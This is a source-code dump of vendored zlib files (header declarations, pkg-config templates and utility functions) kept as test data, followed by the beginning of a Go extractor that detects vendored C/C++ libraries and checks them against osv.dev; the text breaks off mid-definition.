insecure functions sprintf() or vsprintf(), because the secure snprintf() or vsnprintf() functions were not available. This can be determined using zlibCompileFlags(). */ ZEXTERN int ZEXPORT gzputs(gzFile file, const char *s); /* Compress and write the given null-terminated string s to file, excluding the terminating null character. gzputs returns the number of characters written, or -1 in case of error. */ ZEXTERN char * ZEXPORT gzgets(gzFile file, char *buf, int len); /* Read and decompress bytes from file into buf, until len-1 characters are read, or until a newline character is read and transferred to buf, or an end-of-file condition is encountered. If any characters are read or if len is one, the string is terminated with a null character. If no characters are read due to an end-of-file or len is less than one, then the buffer is left untouched. gzgets returns buf which is a null-terminated string, or it returns NULL for end-of-file or in case of error. If there was an error, the contents at buf are indeterminate. */ ZEXTERN int ZEXPORT gzputc(gzFile file, int c); /* Compress and write c, converted to an unsigned char, into file. gzputc returns the value that was written, or -1 in case of error. */ ZEXTERN int ZEXPORT gzgetc(gzFile file); /* Read and decompress one byte from file. gzgetc returns this byte or -1 in case of end of file or error. This is implemented as a macro for speed. As such, it does not do all of the checking the other functions do. I.e. it does not check to see if file is NULL, nor whether the structure file points to has been clobbered or not. */ ZEXTERN int ZEXPORT gzungetc(int c, gzFile file); /* Push c back onto the stream for file to be read as the first character on the next read. At least one character of push-back is always allowed. gzungetc() returns the character pushed, or -1 on failure. gzungetc() will fail if c is -1, and may fail if a character has been pushed but not read yet. If gzungetc is used immediately after gzopen or gzdopen, at least the output buffer size of pushed characters is allowed. (See gzbuffer above.) The pushed character will be discarded if the stream is repositioned with gzseek() or gzrewind(). */ ZEXTERN int ZEXPORT gzflush(gzFile file, int flush); /* Flush all pending output to file. The parameter flush is as in the deflate() function. The return value is the zlib error number (see function gzerror below). gzflush is only permitted when writing. If the flush parameter is Z_FINISH, the remaining data is written and the gzip stream is completed in the output. If gzwrite() is called again, a new gzip stream will be started in the output. gzread() is able to read such concatenated gzip streams. gzflush should be called only when strictly necessary because it will degrade compression if called too often. */ /* ZEXTERN z_off_t ZEXPORT gzseek(gzFile file, z_off_t offset, int whence); Set the starting position to offset relative to whence for the next gzread or gzwrite on file. The offset represents a number of bytes in the uncompressed data stream. The whence parameter is defined as in lseek(2); the value SEEK_END is not supported. If the file is opened for reading, this function is emulated but can be extremely slow. If the file is opened for writing, only forward seeks are supported; gzseek then compresses a sequence of zeroes up to the new starting position. gzseek returns the resulting offset location as measured in bytes from the beginning of the uncompressed stream, or -1 in case of error, in particular if the file is opened for writing and the new starting position would be before the current position. */ ZEXTERN int ZEXPORT gzrewind(gzFile file); /* Rewind file. This function is supported only for reading. gzrewind(file) is equivalent to (int)gzseek(file, 0L, SEEK_SET). */ /* ZEXTERN z_off_t ZEXPORT gztell(gzFile file); Return the starting position for the next gzread or gzwrite on file. This position represents a number of bytes in the uncompressed data stream, and is zero when starting, even if appending or reading a gzip stream from the middle of a file using gzdopen(). gztell(file) is equivalent to gzseek(file, 0L, SEEK_CUR) */ /* ZEXTERN z_off_t ZEXPORT gzoffset(gzFile file); Return the current compressed (actual) read or write offset of file. This offset includes the count of bytes that precede the gzip stream, for example when appending or when using gzdopen() for reading. When reading, the offset does not include as yet unused buffered input. This information can be used for a progress indicator. On error, gzoffset() returns -1. */ ZEXTERN int ZEXPORT gzeof(gzFile file); /* Return true (1) if the end-of-file indicator for file has been set while reading, false (0) otherwise. Note that the end-of-file indicator is set only if the read tried to go past the end of the input, but came up short. Therefore, just like feof(), gzeof() may return false even if there is no more data to read, in the event that the last read request was for the exact number of bytes remaining in the input file. This will happen if the input file size is an exact multiple of the buffer size. If gzeof() returns true, then the read functions will return no more data, unless the end-of-file indicator is reset by gzclearerr() and the input file has grown since the previous end of file was detected. */ ZEXTERN int ZEXPORT gzdirect(gzFile file); /* Return true (1) if file is being copied directly while reading, or false (0) if file is a gzip stream being decompressed. If the input file is empty, gzdirect() will return true, since the input does not contain a gzip stream. If gzdirect() is used immediately after gzopen() or gzdopen() it will cause buffers to be allocated to allow reading the file to determine if it is a gzip file. Therefore if gzbuffer() is used, it should be called before gzdirect(). When writing, gzdirect() returns true (1) if transparent writing was requested ("wT" for the gzopen() mode), or false (0) otherwise. (Note: gzdirect() is not needed when writing. Transparent writing must be explicitly requested, so the application already knows the answer. When linking statically, using gzdirect() will include all of the zlib code for gzip file reading and decompression, which may not be desired.) */ ZEXTERN int ZEXPORT gzclose(gzFile file); /* Flush all pending output for file, if necessary, close file and deallocate the (de)compression state. Note that once file is closed, you cannot call gzerror with file, since its structures have been deallocated. gzclose must not be called more than once on the same file, just as free must not be called more than once on the same allocation. gzclose will return Z_STREAM_ERROR if file is not valid, Z_ERRNO on a file operation error, Z_MEM_ERROR if out of memory, Z_BUF_ERROR if the last read ended in the middle of a gzip stream, or Z_OK on success. */ ZEXTERN int ZEXPORT gzclose_r(gzFile file); ZEXTERN int ZEXPORT gzclose_w(gzFile file); /* Same as gzclose(), but gzclose_r() is only for use when reading, and gzclose_w() is only for use when writing or appending. The advantage to using these instead of gzclose() is that they avoid linking in zlib compression or decompression code that is not used when only reading or only writing respectively. If gzclose() is used, then both compression and decompression code will be included the application when linking to a static zlib library. */ ZEXTERN const char * ZEXPORT gzerror(gzFile file, int *errnum); /* Return the error message for the last error which occurred on file. errnum is set to zlib error number. If an error occurred in the file system and not in the compression library, errnum is set to Z_ERRNO and the application may consult errno to get the exact error code. The application must not modify the returned string. Future calls to this function may invalidate the previously returned string. If file is closed, then the string previously returned by gzerror will no longer be available. gzerror() should be used to distinguish errors from end-of-file for those functions above that do not distinguish those cases in their return values. */ ZEXTERN void ZEXPORT gzclearerr(gzFile file); /* Clear the error and end-of-file flags for file. This is analogous to the clearerr() function in stdio. This is useful for continuing to read a gzip file that is being written concurrently. */ #endif /* !Z_SOLO */ /* checksum functions */ /* These functions are not related to compression but are exported anyway because they might be useful in applications using the compression library. */ ZEXTERN uLong ZEXPORT adler32(uLong adler, const Bytef *buf, uInt len); /* Update a running Adler-32 checksum with the bytes buf[0..len-1] and return the updated checksum. An Adler-32 value is in the range of a 32-bit unsigned integer. If buf is Z_NULL, this function returns the required initial value for the checksum. An Adler-32 checksum is almost as reliable as a CRC-32 but can be computed much faster. Usage example: uLong adler = adler32(0L, Z_NULL, 0); while (read_buffer(buffer, length) != EOF) { adler = adler32(adler, buffer, length); } if (adler != original_adler) error(); */ ZEXTERN uLong ZEXPORT adler32_z(uLong adler, const Bytef *buf, z_size_t len); /* Same as adler32(), but with a size_t length. */ /* ZEXTERN uLong ZEXPORT adler32_combine(uLong adler1, uLong adler2, z_off_t len2); Combine two Adler-32 checksums into one. For two sequences of bytes, seq1 and seq2 with lengths len1 and len2, Adler-32 checksums were calculated for each, adler1 and adler2. adler32_combine() returns the Adler-32 checksum of seq1 and seq2 concatenated, requiring only adler1, adler2, and len2. Note that the z_off_t type (like off_t) is a signed integer. If len2 is negative, the result has no meaning or utility. */ ZEXTERN uLong ZEXPORT crc32(uLong crc, const Bytef *buf, uInt len); /* Update a running CRC-32 with the bytes buf[0..len-1] and return the updated CRC-32. A CRC-32 value is in the range of a 32-bit unsigned integer. If buf is Z_NULL, this function returns the required initial value for the crc. Pre- and post-conditioning (one's complement) is performed within this function so it shouldn't be done by the application. Usage example: uLong crc = crc32(0L, Z_NULL, 0); while (read_buffer(buffer, length) != EOF) { crc = crc32(crc, buffer, length); } if (crc != original_crc) error(); */ ZEXTERN uLong ZEXPORT crc32_z(uLong crc, const Bytef *buf, z_size_t len); /* Same as crc32(), but with a size_t length. */ /* ZEXTERN uLong ZEXPORT crc32_combine(uLong crc1, uLong crc2, z_off_t len2); Combine two CRC-32 check values into one. For two sequences of bytes, seq1 and seq2 with lengths len1 and len2, CRC-32 check values were calculated for each, crc1 and crc2. crc32_combine() returns the CRC-32 check value of seq1 and seq2 concatenated, requiring only crc1, crc2, and len2. */ /* ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t len2); Return the operator corresponding to length len2, to be used with crc32_combine_op(). */ ZEXTERN uLong ZEXPORT crc32_combine_op(uLong crc1, uLong crc2, uLong op); /* Give the same result as crc32_combine(), using op in place of len2. op is is generated from len2 by crc32_combine_gen(). This will be faster than crc32_combine() if the generated op is used more than once. */ /* various hacks, don't look :) */ /* deflateInit and inflateInit are macros to allow checking the zlib version * and the compiler's view of z_stream: */ ZEXTERN int ZEXPORT deflateInit_(z_streamp strm, int level, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateInit_(z_streamp strm, const char *version, int stream_size); ZEXTERN int ZEXPORT deflateInit2_(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateInit2_(z_streamp strm, int windowBits, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateBackInit_(z_streamp strm, int windowBits, unsigned char FAR *window, const char *version, int stream_size); #ifdef Z_PREFIX_SET # define z_deflateInit(strm, level) \ deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_inflateInit(strm) \ inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_deflateInit2(strm, level, method, windowBits, memLevel, strategy) \ deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\ (strategy), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_inflateInit2(strm, windowBits) \ inflateInit2_((strm), (windowBits), ZLIB_VERSION, \ (int)sizeof(z_stream)) # define z_inflateBackInit(strm, windowBits, window) \ inflateBackInit_((strm), (windowBits), (window), \ ZLIB_VERSION, (int)sizeof(z_stream)) #else # define deflateInit(strm, level) \ deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream)) # define inflateInit(strm) \ inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream)) # define deflateInit2(strm, level, method, windowBits, memLevel, strategy) \ deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\ (strategy), ZLIB_VERSION, (int)sizeof(z_stream)) # define inflateInit2(strm, windowBits) \ inflateInit2_((strm), (windowBits), ZLIB_VERSION, \ (int)sizeof(z_stream)) # define inflateBackInit(strm, windowBits, window) \ inflateBackInit_((strm), (windowBits), (window), \ ZLIB_VERSION, (int)sizeof(z_stream)) #endif #ifndef Z_SOLO /* gzgetc() macro and its supporting function and exposed data structure. Note * that the real internal state is much larger than the exposed structure. * This abbreviated structure exposes just enough for the gzgetc() macro. The * user should not mess with these exposed elements, since their names or * behavior could change in the future, perhaps even capriciously. They can * only be used by the gzgetc() macro. You have been warned. */ struct gzFile_s { unsigned have; unsigned char *next; z_off64_t pos; }; ZEXTERN int ZEXPORT gzgetc_(gzFile file); /* backward compatibility */ #ifdef Z_PREFIX_SET # undef z_gzgetc # define z_gzgetc(g) \ ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g)) #else # define gzgetc(g) \ ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g)) #endif /* provide 64-bit offset functions if _LARGEFILE64_SOURCE defined, and/or * change the regular functions to 64 bits if _FILE_OFFSET_BITS is 64 (if * both are true, the application gets the *64 functions, and the regular * functions are changed to 64 bits) -- in case these are set on systems * without large file support, _LFS64_LARGEFILE must also be true */ #ifdef Z_LARGE64 ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *); ZEXTERN z_off64_t ZEXPORT gzseek64(gzFile, z_off64_t, int); ZEXTERN z_off64_t ZEXPORT gztell64(gzFile); ZEXTERN z_off64_t ZEXPORT gzoffset64(gzFile); ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off64_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off64_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off64_t); #endif #if !defined(ZLIB_INTERNAL) && defined(Z_WANT64) # ifdef Z_PREFIX_SET # define z_gzopen z_gzopen64 # define z_gzseek z_gzseek64 # define z_gztell z_gztell64 # define z_gzoffset z_gzoffset64 # define z_adler32_combine z_adler32_combine64 # define z_crc32_combine z_crc32_combine64 # define z_crc32_combine_gen z_crc32_combine_gen64 # else # define gzopen gzopen64 # define gzseek gzseek64 # define gztell gztell64 # define gzoffset gzoffset64 # define adler32_combine adler32_combine64 # define crc32_combine crc32_combine64 # define crc32_combine_gen crc32_combine_gen64 # endif # ifndef Z_LARGE64 ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *); ZEXTERN z_off_t ZEXPORT gzseek64(gzFile, z_off_t, int); ZEXTERN z_off_t ZEXPORT gztell64(gzFile); ZEXTERN z_off_t ZEXPORT gzoffset64(gzFile); ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off_t); # endif #else ZEXTERN gzFile ZEXPORT gzopen(const char *, const char *); ZEXTERN z_off_t ZEXPORT gzseek(gzFile, z_off_t, int); ZEXTERN z_off_t ZEXPORT gztell(gzFile); ZEXTERN z_off_t ZEXPORT gzoffset(gzFile); ZEXTERN uLong ZEXPORT adler32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t); #endif #else /* Z_SOLO */ ZEXTERN uLong ZEXPORT adler32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t); #endif /* !Z_SOLO */ /* undocumented functions */ ZEXTERN const char * ZEXPORT zError(int); ZEXTERN int ZEXPORT inflateSyncPoint(z_streamp); ZEXTERN const z_crc_t FAR * ZEXPORT get_crc_table(void); ZEXTERN int ZEXPORT inflateUndermine(z_streamp, int); ZEXTERN int ZEXPORT inflateValidate(z_streamp, int); ZEXTERN unsigned long ZEXPORT inflateCodesUsed(z_streamp); ZEXTERN int ZEXPORT inflateResetKeep(z_streamp); ZEXTERN int ZEXPORT deflateResetKeep(z_streamp); #if defined(_WIN32) && !defined(Z_SOLO) ZEXTERN gzFile ZEXPORT gzopen_w(const wchar_t *path, const char *mode); #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO ZEXTERN int ZEXPORTVA gzvprintf(gzFile file, const char *format, va_list va); # endif #endif #ifdef __cplusplus } #endif #endif /* ZLIB_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.pc.cmakein ================================================ prefix=@CMAKE_INSTALL_PREFIX@ exec_prefix=@CMAKE_INSTALL_PREFIX@ libdir=@INSTALL_LIB_DIR@ sharedlibdir=@INSTALL_LIB_DIR@ includedir=@INSTALL_INC_DIR@ Name: zlib Description: zlib compression library Version: @VERSION@ Requires: Libs: -L${libdir} -L${sharedlibdir} -lz Cflags: -I${includedir} ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.pc.in ================================================ prefix=@prefix@ exec_prefix=@exec_prefix@ libdir=@libdir@ sharedlibdir=@sharedlibdir@ includedir=@includedir@ Name: zlib Description: zlib compression library Version: @VERSION@ Requires: Libs: -L${libdir} -L${sharedlibdir} -lz Cflags: -I${includedir} ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zutil.c ================================================ /* zutil.c -- target dependent utility functions for the compression library * Copyright (C) 1995-2017 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #include "zutil.h" #ifndef Z_SOLO # include "gzguts.h" #endif z_const char * const z_errmsg[10] = { (z_const char *)"need dictionary", /* Z_NEED_DICT 2 */ (z_const char *)"stream end", /* Z_STREAM_END 1 */ (z_const char *)"", /* Z_OK 0 */ (z_const char *)"file error", /* Z_ERRNO (-1) */ (z_const char *)"stream error", /* Z_STREAM_ERROR (-2) */ (z_const char *)"data error", /* Z_DATA_ERROR (-3) */ (z_const char *)"insufficient memory", /* Z_MEM_ERROR (-4) */ (z_const char *)"buffer error", /* Z_BUF_ERROR (-5) */ (z_const char *)"incompatible version",/* Z_VERSION_ERROR (-6) */ (z_const char *)"" }; const char * ZEXPORT zlibVersion(void) { return ZLIB_VERSION; } uLong ZEXPORT zlibCompileFlags(void) { uLong flags; flags = 0; switch ((int)(sizeof(uInt))) { case 2: break; case 4: flags += 1; break; case 8: flags += 2; break; default: flags += 3; } switch ((int)(sizeof(uLong))) { case 2: break; case 4: flags += 1 << 2; break; case 8: flags += 2 << 2; break; default: flags += 3 << 2; } switch ((int)(sizeof(voidpf))) { case 2: break; case 4: flags += 1 << 4; break; case 8: flags += 2 << 4; break; default: flags += 3 << 4; } switch ((int)(sizeof(z_off_t))) { case 2: break; case 4: flags += 1 << 6; break; case 8: flags += 2 << 6; break; default: flags += 3 << 6; } #ifdef ZLIB_DEBUG flags += 1 << 8; #endif /* #if defined(ASMV) || defined(ASMINF) flags += 1 << 9; #endif */ #ifdef ZLIB_WINAPI flags += 1 << 10; #endif #ifdef BUILDFIXED flags += 1 << 12; #endif #ifdef DYNAMIC_CRC_TABLE flags += 1 << 13; #endif #ifdef NO_GZCOMPRESS flags += 1L << 16; #endif #ifdef NO_GZIP flags += 1L << 17; #endif #ifdef PKZIP_BUG_WORKAROUND flags += 1L << 20; #endif #ifdef FASTEST flags += 1L << 21; #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifdef NO_vsnprintf flags += 1L << 25; # ifdef HAS_vsprintf_void flags += 1L << 26; # endif # else # ifdef HAS_vsnprintf_void flags += 1L << 26; # endif # endif #else flags += 1L << 24; # ifdef NO_snprintf flags += 1L << 25; # ifdef HAS_sprintf_void flags += 1L << 26; # endif # else # ifdef HAS_snprintf_void flags += 1L << 26; # endif # endif #endif return flags; } #ifdef ZLIB_DEBUG #include # ifndef verbose # define verbose 0 # endif int ZLIB_INTERNAL z_verbose = verbose; void ZLIB_INTERNAL z_error(char *m) { fprintf(stderr, "%s\n", m); exit(1); } #endif /* exported to allow conversion of error code to string for compress() and * uncompress() */ const char * ZEXPORT zError(int err) { return ERR_MSG(err); } #if defined(_WIN32_WCE) && _WIN32_WCE < 0x800 /* The older Microsoft C Run-Time Library for Windows CE doesn't have * errno. We define it as a global variable to simplify porting. * Its value is always 0 and should not be used. */ int errno = 0; #endif #ifndef HAVE_MEMCPY void ZLIB_INTERNAL zmemcpy(Bytef* dest, const Bytef* source, uInt len) { if (len == 0) return; do { *dest++ = *source++; /* ??? to be unrolled */ } while (--len != 0); } int ZLIB_INTERNAL zmemcmp(const Bytef* s1, const Bytef* s2, uInt len) { uInt j; for (j = 0; j < len; j++) { if (s1[j] != s2[j]) return 2*(s1[j] > s2[j])-1; } return 0; } void ZLIB_INTERNAL zmemzero(Bytef* dest, uInt len) { if (len == 0) return; do { *dest++ = 0; /* ??? to be unrolled */ } while (--len != 0); } #endif #ifndef Z_SOLO #ifdef SYS16BIT #ifdef __TURBOC__ /* Turbo C in 16-bit mode */ # define MY_ZCALLOC /* Turbo C malloc() does not allow dynamic allocation of 64K bytes * and farmalloc(64K) returns a pointer with an offset of 8, so we * must fix the pointer. Warning: the pointer must be put back to its * original form in order to free it, use zcfree(). */ #define MAX_PTR 10 /* 10*64K = 640K */ local int next_ptr = 0; typedef struct ptr_table_s { voidpf org_ptr; voidpf new_ptr; } ptr_table; local ptr_table table[MAX_PTR]; /* This table is used to remember the original form of pointers * to large buffers (64K). Such pointers are normalized with a zero offset. * Since MSDOS is not a preemptive multitasking OS, this table is not * protected from concurrent access. This hack doesn't work anyway on * a protected system like OS/2. Use Microsoft C instead. */ voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size) { voidpf buf; ulg bsize = (ulg)items*size; (void)opaque; /* If we allocate less than 65520 bytes, we assume that farmalloc * will return a usable pointer which doesn't have to be normalized. */ if (bsize < 65520L) { buf = farmalloc(bsize); if (*(ush*)&buf != 0) return buf; } else { buf = farmalloc(bsize + 16L); } if (buf == NULL || next_ptr >= MAX_PTR) return NULL; table[next_ptr].org_ptr = buf; /* Normalize the pointer to seg:0 */ *((ush*)&buf+1) += ((ush)((uch*)buf-0) + 15) >> 4; *(ush*)&buf = 0; table[next_ptr++].new_ptr = buf; return buf; } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { int n; (void)opaque; if (*(ush*)&ptr != 0) { /* object < 64K */ farfree(ptr); return; } /* Find the original pointer */ for (n = 0; n < next_ptr; n++) { if (ptr != table[n].new_ptr) continue; farfree(table[n].org_ptr); while (++n < next_ptr) { table[n-1] = table[n]; } next_ptr--; return; } Assert(0, "zcfree: ptr not found"); } #endif /* __TURBOC__ */ #ifdef M_I86 /* Microsoft C in 16-bit mode */ # define MY_ZCALLOC #if (!defined(_MSC_VER) || (_MSC_VER <= 600)) # define _halloc halloc # define _hfree hfree #endif voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, uInt items, uInt size) { (void)opaque; return _halloc((long)items, size); } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { (void)opaque; _hfree(ptr); } #endif /* M_I86 */ #endif /* SYS16BIT */ #ifndef MY_ZCALLOC /* Any system without a special alloc function */ #ifndef STDC extern voidp malloc(uInt size); extern voidp calloc(uInt items, uInt size); extern void free(voidpf ptr); #endif voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size) { (void)opaque; return sizeof(uInt) > 2 ? (voidpf)malloc(items * size) : (voidpf)calloc(items, size); } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { (void)opaque; free(ptr); } #endif /* MY_ZCALLOC */ #endif /* !Z_SOLO */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zutil.h ================================================ /* zutil.h -- internal interface and configuration of the compression library * Copyright (C) 1995-2022 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* @(#) $Id$ */ #ifndef ZUTIL_H #define ZUTIL_H #ifdef HAVE_HIDDEN # define ZLIB_INTERNAL __attribute__((visibility ("hidden"))) #else # define ZLIB_INTERNAL #endif #include "zlib.h" #if defined(STDC) && !defined(Z_SOLO) # if !(defined(_WIN32_WCE) && defined(_MSC_VER)) # include # endif # include # include #endif #ifndef local # define local static #endif /* since "static" is used to mean two completely different things in C, we define "local" for the non-static meaning of "static", for readability (compile with -Dlocal if your debugger can't find static symbols) */ typedef unsigned char uch; typedef uch FAR uchf; typedef unsigned short ush; typedef ush FAR ushf; typedef unsigned long ulg; #if !defined(Z_U8) && !defined(Z_SOLO) && defined(STDC) # include # if (ULONG_MAX == 0xffffffffffffffff) # define Z_U8 unsigned long # elif (ULLONG_MAX == 0xffffffffffffffff) # define Z_U8 unsigned long long # elif (UINT_MAX == 0xffffffffffffffff) # define Z_U8 unsigned # endif #endif extern z_const char * const z_errmsg[10]; /* indexed by 2-zlib_error */ /* (size given to avoid silly warnings with Visual C++) */ #define ERR_MSG(err) z_errmsg[Z_NEED_DICT-(err)] #define ERR_RETURN(strm,err) \ return (strm->msg = ERR_MSG(err), (err)) /* To be used only when the state is known to be valid */ /* common constants */ #ifndef DEF_WBITS # define DEF_WBITS MAX_WBITS #endif /* default windowBits for decompression. MAX_WBITS is for compression only */ #if MAX_MEM_LEVEL >= 8 # define DEF_MEM_LEVEL 8 #else # define DEF_MEM_LEVEL MAX_MEM_LEVEL #endif /* default memLevel */ #define STORED_BLOCK 0 #define STATIC_TREES 1 #define DYN_TREES 2 /* The three kinds of block type */ #define MIN_MATCH 3 #define MAX_MATCH 258 /* The minimum and maximum match lengths */ #define PRESET_DICT 0x20 /* preset dictionary flag in zlib header */ /* target dependencies */ #if defined(MSDOS) || (defined(WINDOWS) && !defined(WIN32)) # define OS_CODE 0x00 # ifndef Z_SOLO # if defined(__TURBOC__) || defined(__BORLANDC__) # if (__STDC__ == 1) && (defined(__LARGE__) || defined(__COMPACT__)) /* Allow compilation with ANSI keywords only enabled */ void _Cdecl farfree( void *block ); void *_Cdecl farmalloc( unsigned long nbytes ); # else # include # endif # else /* MSC or DJGPP */ # include # endif # endif #endif #ifdef AMIGA # define OS_CODE 1 #endif #if defined(VAXC) || defined(VMS) # define OS_CODE 2 # define F_OPEN(name, mode) \ fopen((name), (mode), "mbc=60", "ctx=stm", "rfm=fix", "mrs=512") #endif #ifdef __370__ # if __TARGET_LIB__ < 0x20000000 # define OS_CODE 4 # elif __TARGET_LIB__ < 0x40000000 # define OS_CODE 11 # else # define OS_CODE 8 # endif #endif #if defined(ATARI) || defined(atarist) # define OS_CODE 5 #endif #ifdef OS2 # define OS_CODE 6 # if defined(M_I86) && !defined(Z_SOLO) # include # endif #endif #if defined(MACOS) || defined(TARGET_OS_MAC) # define OS_CODE 7 # ifndef Z_SOLO # if defined(__MWERKS__) && __dest_os != __be_os && __dest_os != __win32_os # include /* for fdopen */ # else # ifndef fdopen # define fdopen(fd,mode) NULL /* No fdopen() */ # endif # endif # endif #endif #ifdef __acorn # define OS_CODE 13 #endif #if defined(WIN32) && !defined(__CYGWIN__) # define OS_CODE 10 #endif #ifdef _BEOS_ # define OS_CODE 16 #endif #ifdef __TOS_OS400__ # define OS_CODE 18 #endif #ifdef __APPLE__ # define OS_CODE 19 #endif #if defined(_BEOS_) || defined(RISCOS) # define fdopen(fd,mode) NULL /* No fdopen() */ #endif #if (defined(_MSC_VER) && (_MSC_VER > 600)) && !defined __INTERIX # if defined(_WIN32_WCE) # define fdopen(fd,mode) NULL /* No fdopen() */ # else # define fdopen(fd,type) _fdopen(fd,type) # endif #endif #if defined(__BORLANDC__) && !defined(MSDOS) #pragma warn -8004 #pragma warn -8008 #pragma warn -8066 #endif /* provide prototypes for these when building zlib without LFS */ #if !defined(_WIN32) && \ (!defined(_LARGEFILE64_SOURCE) || _LFS64_LARGEFILE-0 == 0) ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off_t); #endif /* common defaults */ #ifndef OS_CODE # define OS_CODE 3 /* assume Unix */ #endif #ifndef F_OPEN # define F_OPEN(name, mode) fopen((name), (mode)) #endif /* functions */ #if defined(pyr) || defined(Z_SOLO) # define NO_MEMCPY #endif #if defined(SMALL_MEDIUM) && !defined(_MSC_VER) && !defined(__SC__) /* Use our own functions for small and medium model with MSC <= 5.0. * You may have to use the same strategy for Borland C (untested). * The __SC__ check is for Symantec. */ # define NO_MEMCPY #endif #if defined(STDC) && !defined(HAVE_MEMCPY) && !defined(NO_MEMCPY) # define HAVE_MEMCPY #endif #ifdef HAVE_MEMCPY # ifdef SMALL_MEDIUM /* MSDOS small or medium model */ # define zmemcpy _fmemcpy # define zmemcmp _fmemcmp # define zmemzero(dest, len) _fmemset(dest, 0, len) # else # define zmemcpy memcpy # define zmemcmp memcmp # define zmemzero(dest, len) memset(dest, 0, len) # endif #else void ZLIB_INTERNAL zmemcpy(Bytef* dest, const Bytef* source, uInt len); int ZLIB_INTERNAL zmemcmp(const Bytef* s1, const Bytef* s2, uInt len); void ZLIB_INTERNAL zmemzero(Bytef* dest, uInt len); #endif /* Diagnostic functions */ #ifdef ZLIB_DEBUG # include extern int ZLIB_INTERNAL z_verbose; extern void ZLIB_INTERNAL z_error(char *m); # define Assert(cond,msg) {if(!(cond)) z_error(msg);} # define Trace(x) {if (z_verbose>=0) fprintf x ;} # define Tracev(x) {if (z_verbose>0) fprintf x ;} # define Tracevv(x) {if (z_verbose>1) fprintf x ;} # define Tracec(c,x) {if (z_verbose>0 && (c)) fprintf x ;} # define Tracecv(c,x) {if (z_verbose>1 && (c)) fprintf x ;} #else # define Assert(cond,msg) # define Trace(x) # define Tracev(x) # define Tracevv(x) # define Tracec(c,x) # define Tracecv(c,x) #endif #ifndef Z_SOLO voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size); void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr); #endif #define ZALLOC(strm, items, size) \ (*((strm)->zalloc))((strm)->opaque, (items), (size)) #define ZFREE(strm, addr) (*((strm)->zfree))((strm)->opaque, (voidpf)(addr)) #define TRY_FREE(s, p) {if (p) ZFREE(s, p);} /* Reverse the bytes in a 32-bit value */ #define ZSWAP32(q) ((((q) >> 24) & 0xff) + (((q) >> 8) & 0xff00) + \ (((q) & 0xff00) << 8) + (((q) & 0xff) << 24)) #endif /* ZUTIL_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/vendored.go ================================================ // Package vendored provides an extractor for vendored C/C++ code. package vendored import ( "bytes" "context" //nolint:gosec //md5 used to identify files, not for security purposes "crypto/md5" "errors" "fmt" "io" "io/fs" "path/filepath" "slices" "strings" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem" scalibrfs "github.com/google/osv-scalibr/fs" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scalibr/purl" "osv.dev/bindings/go/api" "osv.dev/bindings/go/osvdev" ) var ( vendoredLibNames = map[string]struct{}{ "3rdparty": {}, "dep": {}, "deps": {}, "thirdparty": {}, "third-party": {}, "third_party": {}, "libs": {}, "external": {}, "externals": {}, "vendor": {}, "vendored": {}, } fileExts = []string{ ".hpp", ".h", ".hh", ".cc", ".c", ".cpp", } ) const ( // Name is the unique name of this extractor. Name = "filesystem/vendored" ) const ( // This value may need to be tweaked, or be provided as a configurable flag. determineVersionThreshold = 0.15 maxDetermineVersionFiles = 10000 ) type Config struct { // ScanGitDir 